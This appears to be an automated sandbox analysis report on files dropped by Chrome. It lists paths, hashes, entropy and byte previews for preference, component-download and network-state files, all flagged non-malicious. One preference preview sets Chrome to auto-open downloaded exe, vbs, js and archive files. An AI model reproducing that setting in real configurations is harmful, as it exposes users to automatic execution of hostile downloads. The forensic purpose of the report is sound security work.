Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\8eb23579-8a70-4e70-a8ec-5cb9962ba63e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.923181998146335
Encrypted:	false
SSDEEP:	3:ZJWVZ21dn:ez21dn
MD5:	431826CE41F9B77C3714D55F1F1090BC
SHA1:	ADF6C3D4F692CC74E4CB76476E0BD50A7BD70733
SHA-256:	7245354DA9DD0F13FC8AFA823CE4CC452148E57E3BCEE060E2DE91F75160CB7D
SHA-512:	4043272FCDAA831F059038A11211BF7CBC8CCD7435430B4F57157F63107BA384BB1E25B6DEFE3ECC2C581EA44970668A7FF0FCA2B6A1E8CDCD32A29AC59F4154
Malicious:	false
Reputation:	unknown
Preview:	v10^kM..9;g.c,..,..{.......S...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9cab8e44-e9a7-4815-b798-3b97fe8f98d2.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Reputation:	unknown
Preview:	.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\02704fdf-2e82-4d34-b592-a5954f6e1157

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	265060
Entropy (8bit):	7.995649560918691
Encrypted:	true
SSDEEP:	6144:j71bE8xvMX08XghZNhvfhua/I4dMdYuw4/xCRxQkdE6oa:jp1xE3g3Nhvf39dMNxxyxGLa
MD5:	46D927BF3AE7285ECF3E1BEB08A6AD03
SHA1:	5B94DF9B032536DCA3C493B0A11341EFA7898477
SHA-256:	636EB2212BD1C34A6D9745F271AC0ED9695B727D2EF41747DD7E387C98F33EA5
SHA-512:	1DDAFD04C3F9B49D8E86F0E0B2CA438D851A3B7C4DDFF8BB982512F28A340DAC7D490EDBD5D3CF59C41B3E2F2F320B767557B8DD0E715366DFE0527F0E0003BF
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............\|...d...0j.Ta..68Q..B..3..Iq..._a......V...wa.'D.t.d.c2c/u..-..<......k.W.[..9`.....N.........[.l..B.y...4MQ........T..(....p..)1^....?..^.[.09A....d-.....r....9.......\.%a..-M..=.F#\.}.f.K.\:.....h.R.}b.......?n.?H!7......e.<.*f. !5q.8..i.,a.R:..@X3..=4....H.bD?....d^`\.=i....NO.I..J.6...y...o..O...w.c.....Z...Wu.n..8.0@.M.'.H6>F=.lm~^Km.....S.:..@r..U..........T..k.x.q...~m...J...)..#...F\..Wq.2..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\02704fdf-2e82-4d34-b592-a5954f6e1157:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.427678974330711
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGzIJShF/8b3iDXRm2mGAvn:qY3tNp40zMw/yHNKGG6FWiDXNXAv
MD5:	BBB6B216D77E537215AF590F04EE20A6
SHA1:	C8282C5F823F1561366656BAEB683E628BD7D1A2
SHA-256:	C1917E2FCC784CFD27ADE41207E6E4C1E13403E68F5397714E685D52B33CC6C8
SHA-512:	15ADEEC8FB13006C216F92807835DB5EEFB9349076D37B6FB7E7A16C77F54DE5E6D6BCD4B1AC14BB78F58E75217671216EFFB858478F4DA72104E4C70DF78D8F
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568498583&target=OPTIMIZATION_TARGET_LANGUAGE_DETECTION..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\66092c68-16ff-48b9-8672-1781c1c0cfc6

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	48399548
Entropy (8bit):	7.998960997202003
Encrypted:	true
SSDEEP:	786432:jVcuCYHEFjscSVbUhsfy/IbdHUudj5wy4EjUuJ9DFn80Yu+HATEDvBgxBVHw1Jdh:ZcuCkTVohgyQ59wy4EzNWggDv2xjUJUe
MD5:	F8432B18E3E4BF76AE683D4FB831873E
SHA1:	ADBBEF7F7E47CB9CD0FA4508F5D49AB3994BC88A
SHA-256:	2FB76AAAE2AFD77E633C301DC363AB476FCA4C945EC70BEB6F7CEE2EF7FF6041
SHA-512:	2F17D05BA9463CF5D50DD8CF315FA872C534F50682697770C66A3BDCA59805A488CE19411FD54953D86F2A90B7C7AB6854E8249BBD8179A4B617DCE1C7B77D6F
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............w.H..z.fl.#as.7.d....J[SpF.4.[..JuW@....E..)T....OzW..C..N.-.U...1..F..Y(.....E.F..M... ..X..1.D."y..{..)......!.@+..jC.;.u.=..+...W<e.......T...S0\|.5k.9A..B....;....jB.N.2u...S.Pv......Y>..F..h..Y0..s....x....tm.#.Z..I....n.8"....].4/....z...'cBp.H.....p..0..[l..?....\M..6....mQ...P...3Ru$...u.I.<.Nn.;Wvm....dd.I.m..>l....8./.....\..<..z...s..Y..vx]..>..@V_ &.'S.....D^h.[ng..G..e....>9...zl..1...8

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\66092c68-16ff-48b9-8672-1781c1c0cfc6:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.329148891296734
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGfQDSA+F/8b3iDtWsL:qY3tNp40zMw/yHNKGf8z+FWiDhL
MD5:	42DAB3BE716D32C017C35C5CD76CF126
SHA1:	9FEB29E753A549FB3C406B0D15954ACD21A5E1DE
SHA-256:	69784623F345AA24D7C675D8C0A026EB9A167DBD01DFF25C1EC524E7ADC62E82
SHA-512:	B58D5C829FE16C33EE804BAEF709BAAECCC8EBE67A99DCD0FA33AB75AB320B4AEC6F7D8E6910EA152C74CBE73A8836D4195CF94B22620C56CAFF73323F174DE6
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1659361537155&target=OPTIMIZATION_TARGET_PAGE_ENTITIES..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\7560444c-ec07-4a0b-a2b0-aa662550cd57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	9419
Entropy (8bit):	7.925159491819897
Encrypted:	false
SSDEEP:	192:cUyvLGbeIU8i4Vua0ILg6tuyqlCUtd8n9p4aimegsai+rt:PyjU0a0ILgOZ26zjt
MD5:	AC1A5B29CB8C1984BF9D47EBC28C6C0B
SHA1:	41D27BB0BCC44BAACF6260B15C233D92652201B3
SHA-256:	E9F5E92EC8F10E9A09F8F50692AC37119E843F3E6938E602B7C5DD248AD8F593
SHA-512:	582D18621DBD0B8DFC03FEFF01EE8E28F7BB58B8F0BB991CD1238D4116E35DA59075E9CCE08CB2BDD1C1BA1664CBC4B51615BDFAAC13118CBBFA80EE8E12D17D
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<..............y...f.A......V....X...4..1..Jg..:...I......#.f..P...N..P..~O..9LP..k{NP..R.....wP.yw......D.....].yc.eT..../.VC%D.......j.JgP...2..3..a...c...q.t...4_.o.WpUAZ.$.%kB.~.... ....Ir.HM.'...A.."W.....L3.a.\|...b..%.5d...qy..s.......'.VT}@..^...<.......(..w...K..)&..3RR6.<.g`.e.b..P.+.E$...:....../E..`Y...r.....vT.i...V.).N,..F.Z....~XQ.u...Ev...=......u~<.z...8.}rE.,tQhX.rFz.^1.\|@.....<I...x7.s...i...@.8.k.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\7560444c-ec07-4a0b-a2b0-aa662550cd57:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	172
Entropy (8bit):	5.386205294326134
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaR8dDR9A+F/8b3iDrVXqogppEi0o/:qY3tNp40zMw/yHNKREXA+FWiDrlgppLd
MD5:	D5C72B00E89E9C7BF530B44D6378A05C
SHA1:	7CC976EBD4240CD4F2F72021241D6D47D9BE13B6
SHA-256:	5FCB0BCCAFD16D8E5BBF3043BBF01E7CAE2755999DE985517FBB2C95C1F7D5BD
SHA-512:	7BD7B127CE1D68ACA0C546DCF3ECC03DE8EE6BC331954FC71E035ACEC397C6E65443EFE3CF1C95DFD6C636DAC0ACEA6944734231E5A7553F6643FBAAB42C1008
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=2202180000&target=OPTIMIZATION_TARGET_SEGMENTATION_CHROME_LOW_USER_ENGAGEMENT..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\cfedce33-1363-405d-8080-5b979d3dfa41

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	4955
Entropy (8bit):	7.9048440594438185
Encrypted:	false
SSDEEP:	96:m3Rjis6KpU2mQIuizB0QknoAGKQ6pL65a9gNWADJz8I13EdAhTtQ2LwI61abHwdz:cus6KatWifkoAGN6s5a9mFU+TRbQh3X
MD5:	766A3E17C6325AACDB116643EBE05F7D
SHA1:	E9709278668DC4C2930A956AFABA2A2E64029CF8
SHA-256:	1C6EE9F6267A7C38C8EC1CD015495A5C80324DC417A35672C9CC90931F89F1F4
SHA-512:	686CD14585D7AE04FAF2ADFF6B5F1DB575DB9B106BD5C97957DA2452FE6BBD617CFD01841976A5FFD248EFBC62D502AF0CC0B7989A3BB3C2A960EB29EE273F27
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<...............@....A..h=....g..C..b.H.....nj.6.6...noT>..+3..;.0.(.ys.....{...x...,P.3+.\|...7j..z..@.:.[...).7.n..Y-..R3...j.\......y.....".......c......y...0s.E......g0.fC....F...l.......).....B.b$.$...U..'.1.[.:.L.b`..s1i...J.........$..#...".7.......K.b.).h.J.......#.2.a.p.B......s..'..s..'.Z.uS..de..B........3..2.,.A..ZT.~>..Y~sq!.,....).C0.c..1?B....1.@..Y.....w..I..f.y.S..H..X.6o.8(.... 1j....+I?....Bvs.h.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\cfedce33-1363-405d-8080-5b979d3dfa41:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.422913312692801
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGXUUeQCA+F/8b3iDDz8LYXLFgjsjy:qY3tNp40zMw/yHNKGXNeQD+FWiDDbbFM
MD5:	552717125583DD0F982A19DC01C362FD
SHA1:	FF025F074C9A2038666E9653794A332BED7A855D
SHA-256:	95E0F4E79E26ABEDBD05456066F1733594CFCE1DE0773FFC91CDE8D04C591E16
SHA-512:	1E9092F725C3E3B238679CD6CC657FC0C50A22E276D79D37884CAC4B4E57A0BB4E005B875BDC3A16A4244B892243DF9C24043923E59E3CC92C5BEF99E13597A0
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568541167&target=OPTIMIZATION_TARGET_NOTIFICATION_PERMISSION_PREDICTIONS..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\49bb14c9-1317-4e14-be61-6aae99d9e997.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7819
Entropy (8bit):	4.876317538946068
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSuFvFnK:MY9+y4+U6VB0+pTIenVUM8vKShAhRRHv
MD5:	9C4D03ED1F759E945341D48ACD5CF725
SHA1:	F819C19D61DFDBBEA0B0535D7955336EDFE4BB4C
SHA-256:	950B9FD88363C29840A33600540A0AC26B62A8D41ECA421876DAEBD9DF9C0A96
SHA-512:	0BF00B2D8FCA64FECFDF35DAEC9CF2CEF475B08D35002B7880049828E01FF831F8786E91245705FD18B2E639F72F4965C26B009CD22E17C62037BD36A7E68491
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\6005fbd3-e319-47ab-b0d9-275579855cdf.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	5.585497702544449
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+J6UUXeU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+QUUOU+9IKUf4sU+uQUfJU9
MD5:	5691EE51513059230F938FCEC09AE18F
SHA1:	0C19DF9269D4AA02A9EAF2153D2FCCF87E51C4CA
SHA-256:	AE6B8116B4D417BE858C6FF50CE69965E5BF2D4A08F05908B57D3C5F23973068
SHA-512:	E2593FF4913D5881F209DD54C867D220509BF81DFAD23FFB96E269CC1A1952920AB48D52F00AC227B9C999D771BD54B7C124846323C7B1424A6333E9895BCE7D
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692840283.159194,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304283.159202},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\8dd493af-3194-4352-a4c1-a2fe5e0f1b53.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	5.585112646294235
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+g6UUKReU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+JUULU+9IKUf4sU+uQUfJU9
MD5:	30A8652610C945E78F714CA4FE028CDC
SHA1:	792A8A8442CF26BC485D4ECC79DD1B8C88FD091F
SHA-256:	6950345D20A66ED3283C120C85E33DFB950FB1E09CCF962DD4B5628FE1788383
SHA-512:	A8A31D618D1BEC3F830DF0D27CEE8B23DE68171938D162C582863727FA005ACED16F49000079B5AE847CA6229E8BC5C24F7BD58D519CA39215E4085DD512E5A6
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692840268.904536,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304268.904541},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8040
Entropy (8bit):	4.877997906949624
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSuF7UHZ:MY9+y4+U6VB0+pTIenVUM8vKShAhRRHb
MD5:	8566F0CACA5ABFD93F3AB7232750158B
SHA1:	061D0D8B7738696B33A94C166BAF0D7702805ED9
SHA-256:	2DAD3A357F85CE3B1D3EFDE71505891C65657296369F8608F42974304C919B67
SHA-512:	C3AB8B56F5430D94DD648FAC94160DD8EBF94C8AC33E6A880E299014C7BFC64B12F131F5548AC7A8BA88F6492E32E775A895EE1D5916C6665FFB363623392BA7
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	5.585497702544449
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+J6UUXeU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+QUUOU+9IKUf4sU+uQUfJU9
MD5:	5691EE51513059230F938FCEC09AE18F
SHA1:	0C19DF9269D4AA02A9EAF2153D2FCCF87E51C4CA
SHA-256:	AE6B8116B4D417BE858C6FF50CE69965E5BF2D4A08F05908B57D3C5F23973068
SHA-512:	E2593FF4913D5881F209DD54C867D220509BF81DFAD23FFB96E269CC1A1952920AB48D52F00AC227B9C999D771BD54B7C124846323C7B1424A6333E9895BCE7D
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692840283.159194,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304283.159202},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\a87ae207-d93b-4e7e-950a-3bcbdccfb9af.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7701
Entropy (8bit):	4.876348815046644
Encrypted:	false
SSDEEP:	192:MSj/hChIPlX4rImZpZb8O6L6RtqrcRFtaSlACtanVXMZ+fp00DqQ4nVBU642b+y1:MSj/hMIPlX4rImZpZb8O6L6R0rcRFtaE
MD5:	42796EBE0ECC5C9CD8A7E7DB91BF3CC3
SHA1:	92EA88457976B018883ECB4883F39DAF7E0F5529
SHA-256:	6AA4D3DD787D53099EE5F2E2ED3F375229579C8877ADD2C982FDD1F041C910FE
SHA-512:	05C824A11AFC16AC60DD4E21A7ABF030529E17BD6D5866A6B7183C33C9CBE93AB39ABAB783B014D9AAAEC75668E31C8FD24EDA43E805E27BF6B75C8949108A80
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751336019893","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19357},"server":"https://www.googletagmanager.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751337575357","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20443},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751336231833","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":23646},"server":"https://www.google-analytics.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":[],"expiration":"13307749903829724","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":28412},"server":"https://tools.google.com"},{"alternative_service":[{"advertised_alpns":[],"expiration":"133077499

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\ec9dbfd5-2151-4b90-9cce-f2fddf9c5e3e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	5.582277130551008
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+u6UUEeU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+zUUrU+9IKUf4sU+uQUfJU9
MD5:	BFEE0AFE46C7423C4247C9A8E55DFAE1
SHA1:	0B67E8908009E291ED47F91FEAF4B7166E99E2C4
SHA-256:	1FFA2736C5F71471121683D6901C60D1040D4460667CADB7DAC787D9964B9B32
SHA-512:	1B3CF1F4CFAE788C4C89DDDD2430E25C4A87197517CDAD0BE3EE5C1DC334A0417F0D0BF41E9DDFF2D097D5BD374370843EA928E7E1378B6DCA731D66676F5EB0
Malicious:	false
Reputation:	unknown
